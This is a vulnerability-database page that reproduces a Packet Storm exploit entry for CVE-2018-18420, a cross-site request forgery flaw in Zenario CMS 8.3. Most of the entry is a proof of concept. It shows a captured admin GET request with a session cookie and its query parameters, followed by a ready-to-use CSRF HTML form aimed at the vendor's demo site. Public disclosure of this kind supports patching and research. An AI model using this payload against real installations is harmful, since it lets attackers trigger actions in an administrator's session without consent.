Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIsmail TasdelenPACKETSTORM:149851
HistoryOct 18, 2018 - 12:00 a.m.

Zenar Content Management System 8.3 Cross Site Request Forgery

2018-10-1800:00:00
Ismail Tasdelen
packetstormsecurity.com
36

0.001 Low

EPSS

Percentile

50.1%

JSON
`# Exploit Title: Zenar Content Management System 8.3 - Cross-Site Request Forgery ( CSRF )  
# Date: 2018-05-21  
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://zenar.io/  
# Software Link : https://github.com/TribalSystems/Zenario/releases/tag/8.3.47997  
# Software : Zenar Content Management System 8.3  
# Version : 8.3  
# Vulernability Type : Web Application  
# Vulenrability : Cross-Site Request Forgery ( CSRF )  
# CVE : CVE-2018-18420  
  
# Cross-Site Request Forgery (CSRF) vulnerability was discovered in  
# the 8.3 version of Zenar Content Management System via the  
# admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent URI.  
  
# POC :  
  
# GET Request :  
  
Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0  
Request Method: GET  
Status Code: 200 OK  
Remote Address: 213.146.173.88:80  
Referrer Policy: no-referrer-when-downgrade  
Accept: text/plain, */*; q=0.01  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: keep-alive  
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1  
Host: demo.zenar.io  
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html  
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36  
X-Requested-With: XMLHttpRequest  
  
# Query String Parametres :  
  
path: zenario__content/panels/content  
skinId:   
refinerId: html  
refinerName: content_type  
refiner__content_type: html  
_limit: 50  
_start: 0  
_item: html_10  
_sort_col: first_created_datetime  
_sort_desc: 0  
  
# CSRF HTML :  
  
<html><head>  
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>  
</head><body>  
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">  
<input type="text" name="html_" value="10" /><br />  
<input type='submit' value='Go!' />  
</form>  
</body></html>  
  
# You want to follow my activity ?  
  
https://www.linkedin.com/in/ismailtasdelen  
https://github.com/ismailtasdelen  
https://twitter.com/ismailtsdln  
`

Related

osv 1
prion 1
nvd 1
veracode 1
github 1
cve 1
cvelist 1
osv
osv
Zenario CMS vulnerable to CSRF
2022-05-14 01:53:42
prion
prion
Cross site request forgery (csrf)
2018-10-19 22:29:00
nvd
nvd
CVE-2018-18420
2018-10-19 22:29:02
veracode
veracode
Cross-Site Request Forgery (CSRF)
2018-10-22 09:32:03
github
github
Zenario CMS vulnerable to CSRF
2022-05-14 01:53:42
cve
cve
CVE-2018-18420
2018-10-19 22:29:02
cvelist
cvelist
CVE-2018-18420
2018-10-19 22:00:00

0.001 Low

EPSS

Percentile

50.1%

JSON
Related for PACKETSTORM:149851
osv1prion1nvd1veracode1github1cve1cvelist1